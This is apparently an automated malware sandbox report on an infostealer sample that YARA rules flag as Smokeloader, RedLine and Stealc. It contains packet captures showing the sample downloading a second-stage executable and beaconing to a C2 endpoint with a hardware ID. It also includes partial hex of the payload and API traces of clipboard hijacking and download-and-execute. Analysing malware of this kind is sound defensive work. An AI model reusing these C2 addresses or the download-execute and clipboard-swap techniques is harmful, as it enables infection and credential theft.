Dec 11, 2024 08:57:00.734802008 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.734844923 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.735881090 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.735927105 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.736010075 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.736054897 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.737070084 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.737118006 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.737185001 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.737227917 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.738241911 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.738291025 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.738364935 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.738405943 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.739453077 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.739516020 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.739561081 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.739603043 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.740636110 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.740695000 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:01.916542053 CET	49706	80	192.168.2.5	92.255.57.89
Dec 11, 2024 08:57:02.037244081 CET	80	49706	92.255.57.89	192.168.2.5
Dec 11, 2024 08:57:02.037328959 CET	49706	80	192.168.2.5	92.255.57.89
Dec 11, 2024 08:57:02.037476063 CET	49706	80	192.168.2.5	92.255.57.89
Dec 11, 2024 08:57:02.156806946 CET	80	49706	92.255.57.89	192.168.2.5
Dec 11, 2024 08:57:03.369590998 CET	80	49706	92.255.57.89	192.168.2.5
Dec 11, 2024 08:57:03.369654894 CET	49706	80	192.168.2.5	92.255.57.89
Dec 11, 2024 08:57:03.372504950 CET	49706	80	192.168.2.5	92.255.57.89
Dec 11, 2024 08:57:03.491744041 CET	80	49706	92.255.57.89	192.168.2.5
Dec 11, 2024 08:57:03.819060087 CET	80	49706	92.255.57.89	192.168.2.5
Dec 11, 2024 08:57:03.819128990 CET	49706	80	192.168.2.5	92.255.57.89
Dec 11, 2024 08:57:05.085608959 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:05.085684061 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:08.825392008 CET	80	49706	92.255.57.89	192.168.2.5
Dec 11, 2024 08:57:08.825472116 CET	49706	80	192.168.2.5	92.255.57.89
Dec 11, 2024 08:57:29.361541033 CET	49706	80	192.168.2.5	92.255.57.89
Dec 11, 2024 08:58:46.022499084 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:58:46.384625912 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:58:47.034681082 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:58:48.272403955 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:58:50.787962914 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:58:55.630598068 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:59:05.288022041 CET	49705	80	192.168.2.5	176.113.115.19

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 11, 2024 08:56:56.027877092 CET	58446	53	192.168.2.5	1.1.1.1
Dec 11, 2024 08:56:56.271752119 CET	53	58446	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 11, 2024 08:56:56.027877092 CET	192.168.2.5	1.1.1.1	0xb45b	Standard query (0)	post-to-me.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 11, 2024 08:56:56.271752119 CET	1.1.1.1	192.168.2.5	0xb45b	No error (0)	post-to-me.com		104.21.56.70	A (IP address)	IN (0x0001)	false
Dec 11, 2024 08:56:56.271752119 CET	1.1.1.1	192.168.2.5	0xb45b	No error (0)	post-to-me.com		172.67.179.207	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

post-to-me.com

176.113.115.19

92.255.57.89

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	176.113.115.19	80	432	C:\Users\user\Desktop\LXS5itpTK7.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 08:56:58.397805929 CET	85	OUT	GET /ScreenUpdateSync.exe HTTP/1.1 User-Agent: ShareScreen Host: 176.113.115.19
Dec 11, 2024 08:56:59.719868898 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 07:56:59 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Wed, 11 Dec 2024 07:45:02 GMT ETag: "5fa00-628f9c67d84af" Accept-Ranges: bytes Content-Length: 391680 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 db 51 5d c4 9f 30 33 97 9f 30 33 97 9f 30 33 97 81 62 a6 97 86 30 33 97 81 62 b0 97 e3 30 33 97 81 62 b7 97 b5 30 33 97 b8 f6 48 97 94 30 33 97 9f 30 32 97 1f 30 33 97 81 62 b9 97 9e 30 33 97 81 62 a7 97 9e 30 33 97 81 62 a2 97 9e 30 33 97 52 69 63 68 9f 30 33 97 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 35 2c 91 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 5a 05 00 00 04 01 00 00 00 00 00 1f 44 00 00 00 10 00 00 00 70 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 25 00 00 04 00 00 64 31 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Q]030303b03b03b03H030203b03b03b03Rich03PEL5,dZDp@%d1_x ;-@.text>YZ `.datap`^@.rsrc <@@
Dec 11, 2024 08:56:59.719887972 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 64 05 00 00 00 00 00 a2 64 05 00 00 00 00 00 98 61 05 00 b6 61 05 00 cc 61 05 00 e0 61 05 00 f4 61 05 00 0a 62 05 00 20 62 Data Ascii: ddaaaaab b4bBbZbjb~bbbbbbcca@cPcbcrccccccccd"d0dDdZdjd~dXala0cDa
Dec 11, 2024 08:56:59.719934940 CET	1236	IN	Data Raw: 30 69 05 00 22 65 05 00 3e 65 05 00 5c 65 05 00 6e 65 05 00 7a 65 05 00 92 65 05 00 aa 65 05 00 bc 65 05 00 cc 65 05 00 da 65 05 00 ec 65 05 00 04 66 05 00 18 66 05 00 2c 66 05 00 38 66 05 00 40 66 05 00 4e 66 05 00 5a 66 05 00 70 66 05 00 82 66 Data Ascii: 0i"e>e\enezeeeeeeeff,f8f@fNfZfpfffffffffg$g2g@gZgjggggggggggh8hHhXhjh~hhhhhhhhi id
Dec 11, 2024 08:56:59.719985962 CET	1236	IN	Data Raw: 69 6f 6e 2e 0d 0a 00 00 52 36 30 33 30 0d 0a 2d 20 43 52 54 20 6e 6f 74 20 69 6e 69 74 69 61 6c 69 7a 65 64 0d 0a 00 00 52 36 30 32 38 0d 0a 2d 20 75 6e 61 62 6c 65 20 74 6f 20 69 6e 69 74 69 61 6c 69 7a 65 20 68 65 61 70 0d 0a 00 00 00 00 52 36 Data Ascii: ion.R6030- CRT not initializedR6028- unable to initialize heapR6027- not enough space for lowio initializationR6026- not enough space for stdio initializationR6025- pure virtual function callR6024- no
Dec 11, 2024 08:56:59.719999075 CET	1236	IN	Data Raw: 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f 00 3d 00 00 00 00 00 00 00 06 80 80 86 80 81 80 00 00 10 03 86 80 86 82 80 14 05 Data Ascii: IJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~=EEE00P('8PW700PP (`h`hhhxppwppGetProcessWindowStationGetUserObjectInformationAGetLastActivePopupGetActiveWindow
Dec 11, 2024 08:56:59.720134974 CET	672	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: h(((( H
Dec 11, 2024 08:56:59.720149994 CET	1236	IN	Data Raw: bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~
Dec 11, 2024 08:56:59.720168114 CET	1236	IN	Data Raw: 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 60 64 79 6e 61 6d 69 63 20 61 74 65 78 69 74 20 64 65 73 74 72 75 63 74 6f 72 20 66 6f 72 Data Ascii: or iterator'`vector copy constructor iterator'`dynamic atexit destructor for '`dynamic initializer for '`eh vector vbase copy constructor iterator'`eh vector copy constructor iterator'`managed vector destructor iterator'`ma
Dec 11, 2024 08:56:59.720180988 CET	1236	IN	Data Raw: 04 2b 40 00 f8 2a 40 00 ec 2a 40 00 9a 1a 40 00 30 26 40 00 14 26 40 00 00 26 40 00 e0 25 40 00 c4 25 40 00 e4 2a 40 00 dc 2a 40 00 98 1a 40 00 d8 2a 40 00 d4 2a 40 00 d0 2a 40 00 cc 2a 40 00 c8 2a 40 00 c4 2a 40 00 b8 2a 40 00 b4 2a 40 00 b0 2a Data Ascii: +@@@@0&@&@&@%@%@@@@@@@@@@@@@@@@@@@@@@@@@\|@x@t@p@l@h@d@`@\@X@T@P@L@H@D@@@<@0@$@@@)@)@)@)@)@x)@X)@
Dec 11, 2024 08:56:59.720196009 CET	1236	IN	Data Raw: 8b 15 24 84 45 00 81 c7 3f 02 00 00 89 4d e4 89 55 e0 c7 45 f0 20 00 00 00 8d a4 24 00 00 00 00 c7 45 f4 02 00 00 00 83 45 f4 03 8b 75 f8 a1 ec fb 45 00 c1 e6 04 03 75 e4 3d a9 0f 00 00 75 0c c7 05 e8 fb 45 00 40 2e eb ed eb 1b 3d eb 03 00 00 75 Data Ascii: $E?MUE $EEuEu=uE@.=ujj@xEEEEUU3=EE=ujj$@1u=Eumjjjj@<PjX@j@jjj@<Qjjjt@U
Dec 11, 2024 08:56:59.839615107 CET	1236	IN	Data Raw: 33 ff 33 f6 81 fe 8f 2c a6 0f 7d 02 ff d3 81 fe 42 71 20 00 7f 09 46 81 fe 12 7d 06 00 7c e5 33 f6 ff 15 b0 10 40 00 83 fe 61 75 13 89 7d f0 81 45 f0 87 6c 00 00 8b 45 f0 01 05 7c f6 45 00 46 81 fe bd 74 06 00 7c d9 8b 35 3c 10 40 00 8b 3d 4c 10 Data Ascii: 33,}Bq F}\|3@au}ElE\|EFt\|5<@=L@@@E{$=Eu)jjQjjjj@jj@=Eu$UR@jjj@jjjj @muc\|EM_^d[]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	92.255.57.89	80	4416	C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 08:57:02.037476063 CET	87	OUT	GET / HTTP/1.1 Host: 92.255.57.89 Connection: Keep-Alive Cache-Control: no-cache
Dec 11, 2024 08:57:03.369590998 CET	203	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 07:57:03 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 11, 2024 08:57:03.372504950 CET	412	OUT	POST /45c616e921a794b8.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKFCBFCBFBKEBFIDBKEC Host: 92.255.57.89 Content-Length: 213 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 43 42 46 43 42 46 42 4b 45 42 46 49 44 42 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 42 38 32 46 44 32 44 31 32 39 45 34 38 37 32 35 36 33 32 36 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 42 46 43 42 46 42 4b 45 42 46 49 44 42 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 42 46 43 42 46 42 4b 45 42 46 49 44 42 4b 45 43 2d 2d 0d 0a Data Ascii: ------BKFCBFCBFBKEBFIDBKECContent-Disposition: form-data; name="hwid"EB82FD2D129E487256326------BKFCBFCBFBKEBFIDBKECContent-Disposition: form-data; name="build"default------BKFCBFCBFBKEBFIDBKEC--
Dec 11, 2024 08:57:03.819060087 CET	210	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 07:57:03 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	104.21.56.70	443	432	C:\Users\user\Desktop\LXS5itpTK7.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 07:56:57 UTC	90	OUT	GET /track_prt.php?sub=0&cc=DE HTTP/1.1 User-Agent: ShareScreen Host: post-to-me.com
2024-12-11 07:56:58 UTC	796	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 07:56:58 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.4.16 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k6Eoi0QTnsXogBUEQ7u0aayIpnTCFvXhLdgQRRJcpxLXpkjNvrXxKiBof4ZyXs81wZCYH110qILyGu7WhtW6%2BJLrdJvkCrD8TDTL71G1PGYiWYvnjrQm9RkAbWG9AmDdgQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f03ebcd2ea1238a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1848&min_rtt=1837&rtt_var=697&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=728&delivery_rate=1589548&cwnd=173&unsent_bytes=0&cid=6ceafad1adc35677&ts=660&x=0"
2024-12-11 07:56:58 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-11 07:56:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	02:56:54
Start date:	11/12/2024
Path:	C:\Users\user\Desktop\LXS5itpTK7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\LXS5itpTK7.exe"
Imagebase:	0x400000
File size:	461'824 bytes
MD5 hash:	99FAD17313297DA97105802D647B80B6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4483503852.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	02:57:00
Start date:	11/12/2024
Path:	C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe"
Imagebase:	0x400000
File size:	391'680 bytes
MD5 hash:	1A1D5627373ECD30414938E941F281B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.2358488571.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000003.2086429578.0000000002360000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.2358508594.000000000090E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:57:03
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 1360
Imagebase:	0x740000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	20.6%
Signature Coverage:	5.7%
Total number of Nodes:	761
Total number of Limit Nodes:	20

Executed Functions

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 004016E6
Sleep.KERNEL32(00001541,0000004C), ref: 004016F0

Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27

OpenClipboard.USER32(00000000), ref: 0040171D
GetClipboardData.USER32(00000001), ref: 0040172D
GlobalLock.KERNEL32(00000000), ref: 0040173C
_strlen.LIBCMT ref: 00401749
_strlen.LIBCMT ref: 00401778
_strlen.LIBCMT ref: 004018BC
EmptyClipboard.USER32 ref: 004018D2
GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
GlobalLock.KERNEL32(00000000), ref: 004018FD
GlobalUnlock.KERNEL32(00000000), ref: 00401909
SetClipboardData.USER32(00000001,00000000), ref: 00401912
GlobalFree.KERNEL32(00000000), ref: 00401919
CloseClipboard.USER32 ref: 0040193D
Sleep.KERNEL32(000002D2), ref: 00401948

Strings

i, xrefs: 00401759

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: i
API String ID: 1583243082-3865851505
Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D

Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
CloseHandle.KERNEL32(00000000), ref: 00402B07
ShellExecuteExW.SHELL32(?), ref: 00402B68
WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
CloseHandle.KERNEL32(?), ref: 00402B89
InternetCloseHandle.WININET(00000000), ref: 00402B92
InternetCloseHandle.WININET(00000000), ref: 00402B95

Strings

ShareScreen, xrefs: 00402A12
<, xrefs: 00402B45
.exe, xrefs: 00402A6B

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: .exe$<$ShareScreen
API String ID: 3323492106-493228180
Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4

Function 005407A6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005407CE
Module32First.KERNEL32(00000000,00000224), ref: 005407EE

Memory Dump Source

Source File: 00000000.00000002.4483503852.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 0cf283d98efe61e3cd9481b54c82bc3f55ec36781a81dceacc3b71ca884935ef
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: BBF062311017116BD7203AB5988DAAF7AE8FF89769F201528E742910C0DA74F8454A62

Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27

GetLastError.KERNEL32 ref: 0043D150
__dosmaperr.LIBCMT ref: 0043D157
GetFileType.KERNEL32(00000000), ref: 0043D163
GetLastError.KERNEL32 ref: 0043D16D
__dosmaperr.LIBCMT ref: 0043D176
CloseHandle.KERNEL32(00000000), ref: 0043D196
CloseHandle.KERNEL32(?), ref: 0043D2E0
GetLastError.KERNEL32 ref: 0043D312
__dosmaperr.LIBCMT ref: 0043D319

Strings

H, xrefs: 0043D29E

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A

Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69

Function 0213003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0213024D

Strings

cess, xrefs: 0213018D
kernel32.dll, xrefs: 0213008F, 02130095

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 4d62c31e7b113053c7fec1a81403a43082a4b2b429e0d1c2d19d79fb67bed87b
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 9F527975A01229DFDB65CF58C984BACBBB1BF09304F1580E9E94DAB351DB30AA85CF14

Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed
